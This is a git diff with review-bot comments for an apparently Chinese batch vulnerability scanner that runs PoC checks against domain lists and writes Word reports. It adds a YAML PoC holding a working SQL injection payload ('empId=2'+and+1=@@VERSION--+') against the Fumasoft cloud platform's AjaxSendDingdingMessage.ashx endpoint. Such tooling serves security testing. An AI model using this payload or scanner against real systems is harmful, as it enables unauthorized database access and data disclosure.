diff --git a/new_poc_tools.py b/new_poc_tools.py
index 5f2f284..b172448 100644
--- a/new_poc_tools.py
+++ b/new_poc_tools.py
@@ -7,6 +7,7 @@ import urllib.parse
 import sys
 import docx
 import os
+import re
 import warnings
 import requests
 import argparse
@@ -48,11 +49,15 @@ def get_company_name(url):
 soup = BeautifulSoup(response.content, 'html.parser')
 # 查找公司名称的标签
- company_name_tag = soup.find('a', id='companyName')
+ company_name_tag = soup.find('div', {'tag': 'company_name'})
 # 提取公司名称
 if company_name_tag:
- return company_name_tag.text
+ text = company_name_tag.text
+ cleaned_text = re.sub(r'[^\w\s]', '', text) # 去除英文符号
+ cleaned_text = re.sub(r'\s+', ' ', cleaned_text).strip() # 去除多余空格和换行符
+ return cleaned_text
+ # return company_name_tag.text
 else:
 print("公司名称未找到")
 return None
@@ -100,9 +105,9 @@ def create_document():
 def extract_root_domain(url):
 extracted = tldextract.extract(url)
 root_domain = f"{extracted.domain}.{extracted.suffix}"
- encoded_bytes = base64.b64encode(root_domain.encode('utf-8'))
- encoded_str = encoded_bytes.decode('utf-8')
- return urllib.parse.quote(encoded_str)
+ # encoded_bytes = base64.b64encode(root_domain.encode('utf-8'))
+ # encoded_str = encoded_bytes.decode('utf-8')
+ return urllib.parse.quote(root_domain)
 def add_scan_results_to_document(document, domain, results, include_all, description, choice_3):
 for name, result, status_code, url, res_time in results:
@@ -117,7 +122,8 @@ def add_scan_results_to_document(document, domain, results, include_all, descrip
 if result == "存在漏洞" and choice_3 == "y":
 screenshot_path_1 = screenshot(url)
 # print(screenshot_path_1)
- screenshot_path_2 = screenshot("https://icp.chinaz.com/home/info?host=" + extract_root_domain(domain))
+ # 站长工具反爬,该截图已废弃
+ # screenshot_path_2 = screenshot("https://icp.chinaz.com/home/info?host=" + extract_root_domain(domain))
 # print(screenshot_path_2)
 #word处理部分
 #导入模板
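Review bot: The new cleaning branch in get_company_name can return an empty string (every character stripped, then `.strip()`), and that value later becomes the report filename prefix through `str(company_name)` in add_scan_results_to_document, producing a `_<name>.docx` file; returning `cleaned_text or None` would make the empty case behave like the tag-not-found path. The `# 去除英文符号` comment undersells what `re.sub(r'[^\w\s]', '', text)` does: with a str pattern `\w` is Unicode-aware, so CJK letters survive while full-width punctuation and path characters such as `/`, `\` and `.` are removed as well, which is the right property for a value that ends up in a filename and is worth stating, e.g. `# 去除所有非字母/数字字符(含中文标点和路径分隔符),结果将作为文件名的一部分`. The dead `# return company_name_tag.text` line should be deleted rather than kept as a comment. get_company_name begins before this hunk.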
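Review bot: `root_domain = f"{extracted.domain}.{extracted.suffix}"` in extract_root_domain yields a trailing dot whenever tldextract leaves `suffix` empty (as far as I know it does so for IP-literal and bare-hostname targets), and the new `urllib.parse.quote(root_domain)` now feeds that value straight into the `get_company_name("https://whois.west.cn/icp/" + …)` lookup further down instead of a base64 string; `root_domain = extracted.registered_domain or extracted.domain` avoids the dangling dot. The commented-out base64 lines here, the commented `screenshot_path_2 = …` line in the next hunk and the commented `run.add_picture(screenshot_path_2 …)` line in the hunk after it are dead code that version control already remembers — delete them. If `base64` is imported only for this function its import is now unused as well; the import block is not part of this diff, so that needs checking in the file.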
@@ -136,33 +142,42 @@ def add_scan_results_to_document(document, domain, results, include_all, descrip
 run = paragraph.add_run()
 if screenshot_path_1:
 run.add_picture(screenshot_path_1, width=Cm(16.52), height=Cm(9.13)) #添加图片
- run.add_picture(screenshot_path_2, width=Cm(16.52), height=Cm(9.13)) #添加图片
+ # run.add_picture(screenshot_path_2, width=Cm(16.52), height=Cm(9.13)) #添加ICP备案图片,已废弃寻找新方法
 doc_save_path = './file/result/'
 if not os.path.exists(doc_save_path):
 os.mkdir(doc_save_path)
 #保存word,根据需要自行更改
- company_name = get_company_name("https://icp.chinaz.com/" + domain)
+ company_name = get_company_name("https://whois.west.cn/icp/" + extract_root_domain(domain))
 doc_name = str(company_name) + "_" + name + ".docx"
 doc.save(doc_save_path + doc_name)
-def mass_poc_scan(domains, include_all, choice_2, docx_name):
+def mass_poc_scan(domains, include_all, choice_2, docx_name, status):
 document = create_document()
 try:
 for domain in domains:
 logging.info(f"正在扫描域名:{domain}")
- if not check_url_status(domain):
- logging.warning(f"访问失败,跳过当前域名的扫描:{domain}")
- print("--------------------------------------------------")
- if choice_2.lower() == 'n':
- document.add_heading(f"目标:{domain} 无法访问!", level=3) # 将标题升级为level=3
- continue
+ if status == 'y':
+ if not check_url_status(domain):
+ logging.warning(f"访问失败,跳过当前域名的扫描:{domain}")
+ print("--------------------------------------------------")
+ if choice_2.lower() == 'y':
+ document.add_heading(f"目标:{domain} 无法访问!", level=3) # 将标题升级为level=3
+ continue
- try:
- results, description = validate_main(domain)
- add_scan_results_to_document(document, domain, results, include_all, description, choice_3)
- except Exception as e:
- logging.error(f"扫描域名 {domain} 时出错:{e}")
- print("--------------------------------------------------")
+ try:
+ results, description = validate_main(domain)
+ add_scan_results_to_document(document, domain, results, include_all, description, choice_3)
+ except Exception as e:
+ logging.error(f"扫描域名 {domain} 时出错:{e}")
+ print("--------------------------------------------------")
+
+ else:
+ try:
+ results, description = validate_main(domain)
+ add_scan_results_to_document(document, domain, results, include_all, description, choice_3)
+ except Exception as e:
+ logging.error(f"扫描域名 {domain} 时出错:{e}")
+ print("--------------------------------------------------")
 except KeyboardInterrupt:
 print(Fore.RED +'\n检测到Ctrl+C,中断程序。' + Fore.RESET)
 save_document(document, docx_name)
@@ -191,6 +206,7 @@ if __name__ == "__main__":
 file_path = "./urls.txt"
 include_all = False
 choice_3 = 'y'
+ status = 'y'
 else: # 交互模式
 choice = input(Fore.BLUE + "请问是否需要输入其他目标文件?(y/n): " + Fore.RESET).lower()
@@ -203,6 +219,8 @@ if __name__ == "__main__":
 print("--------------------------------------------------")
 domains = extract_domains_from_file(file_path)
+ status = input(Fore.BLUE + "请问是否需要检查目标网站存活状态?(y/n): " + Fore.RESET).lower()
+ print("--------------------------------------------------")
 choice_2 = input(Fore.BLUE + "请问是否删除无漏洞网站记录?(y/n): " + Fore.RESET).lower()
 include_all = choice_2 != 'y'
 print("--------------------------------------------------")
@@ -212,9 +230,13 @@ if __name__ == "__main__":
 # 执行扫描
 domains = extract_domains_from_file(file_path)
 if args.batch:
- mass_poc_scan(domains, include_all, choice_3, args.name)
+ mass_poc_scan(domains, include_all, choice_3, args.name, status)
 else:
 docx_name = input(Fore.BLUE + "请输入总报告文件名(回车可跳过生成报告步骤):" + Fore.RESET)
 print("--------------------------------------------------")
- mass_poc_scan(domains, include_all, choice_3, docx_name)
-
\ No newline at end of file
+ mass_poc_scan(domains, include_all, choice_3, docx_name, status)
+
+# if __name__ == "__main__":
+# domain = 'http://vr.sh-fit.com:9090'
+# company_name = get_company_name("https://whois.west.cn/icp/" + extract_root_domain(domain))
+# print(company_name)
\ No newline at end of file
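Review bot: The `if choice_2.lower() == 'y':` test that decides whether an unreachable target gets a heading is evaluated against the wrong flag: both call sites in the last hunk pass `choice_3` as this positional parameter (`mass_poc_scan(domains, include_all, choice_3, …, status)`), so flipping `'n'` to `'y'` now ties the "无法访问" heading to the screenshot option rather than to the keep-no-vuln-records answer; `include_all` (already computed as `choice_2 != 'y'` in the main block and passed in) looks like the intended condition, i.e. `if include_all:`, but please confirm with the author. The `status == 'y'` branch also duplicates the whole try/except scan body, and the inner `choice_3` is read from module scope rather than from a parameter; folding the liveness probe into a single guard keeps one copy of the scan body, as below. The first lines of this hunk belong to add_scan_results_to_document, which starts outside it; mass_poc_scan itself is fully inside.

```python
def mass_poc_scan(domains, include_all, choice_2, docx_name, status):
    document = create_document()
    try:
        for domain in domains:
            logging.info(f"正在扫描域名:{domain}")
            # The liveness probe is optional (status == 'y'); an unreachable
            # target is recorded if requested and skipped, every other case
            # falls through to the single scan body below.
            if status == 'y' and not check_url_status(domain):
                logging.warning(f"访问失败,跳过当前域名的扫描:{domain}")
                print("--------------------------------------------------")
                if choice_2.lower() == 'y':
                    document.add_heading(f"目标:{domain} 无法访问!", level=3)
                continue
            try:
                results, description = validate_main(domain)
                add_scan_results_to_document(document, domain, results, include_all, description, choice_3)
            except Exception as e:
                logging.error(f"扫描域名 {domain} 时出错:{e}")
                print("--------------------------------------------------")
    # … unchanged: except KeyboardInterrupt handler and save_document …
```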
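Review bot: The commented-out second `__main__` block appended at the end of the file hard-codes a real external host in its `domain = 'http://…'` line as a lookup target; committed code should not carry live third-party hosts even in comments — drop the block, or turn it into a test that uses a placeholder or local address. In the same three hunks, `status` is only ever compared with `'y'`, so any other interactive answer silently disables the liveness check while the batch branch pins `status = 'y'`; normalising once at input time, e.g. `status = 'y' if status in ('y', 'yes') else 'n'`, would make the accepted answers explicit and match how `include_all` is derived from `choice_2`.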
diff --git a/poc/OA-Poc/fuma-AjaxSendDingdingMessage-SQL.yaml b/poc/OA-Poc/fuma-AjaxSendDingdingMessage-SQL.yaml
new file mode 100644
index 0000000..cd800ca
--- /dev/null
+++ b/poc/OA-Poc/fuma-AjaxSendDingdingMessage-SQL.yaml
@@ -0,0 +1,30 @@
+keyword: fumasoft
+name: 孚盟云平台存在SQL注入漏洞
+description: | # 下一行可填写漏洞描述
+ 孚盟云平台AjaxSendDingdingMessage.ashx接口存在SQL注入漏洞。
+requests: # 为空代表默认或者不启用
+ path: "/m/Dingding/Ajax/AjaxSendDingdingMessage.ashx"
+ method: POST
+ headers:
+ Accept: '*/*'
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8
+ Referer: https://www.baidu.com
+ Accept-Encoding: gzip, deflate
+ Connection: keep-alive
+ Content-Type: application/x-www-form-urlencoded
+ body-raw: |- # 如果需要发送请求体,在下一行开始填写
+ action=SendDingMeg_Mail&empId=2'+and+1=@@VERSION--+
+
+response:
+ path: "" # 不填则默认接收此请求的响应包
+ status-code: 200
+ body: "Copyright" # 此处可填写响应体中确认漏洞存在的关键字或者其他信息
+ time: # 此处填写响应包响应时间,默认不启用
+ headers:
+ Server:
+ Content-type:
+ Content-length:
+ Date:
+ Connection:
+impact: | # 下一行可填写漏洞影响
+ 孚盟云平台AjaxSendDingdingMessage.ashx接口存在SQL注入漏洞,可能导致数据库敏感信息泄露。
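Review bot: The new POC carries no affected-version, vendor-fix or severity metadata, so a report generated from it tells the reader only that the endpoint is injectable and nothing about what to upgrade or patch; `description`/`impact` (or a new field such as `reference:` if the loader can carry one) should name the affected product versions and the vendor fix once known, and leave an explicit placeholder until then. The empty keys under `response.headers` (`Server:`, `Content-type:`, …) and the empty `time:` parse as YAML null; if the matcher treats a null entry as "not checked" that is fine, but a comment on `headers:` saying so would stop someone from turning them into required matches, and the `Referer: https://www.baidu.com` request header deserves a one-line comment on why it is set, since it is not obviously part of the check.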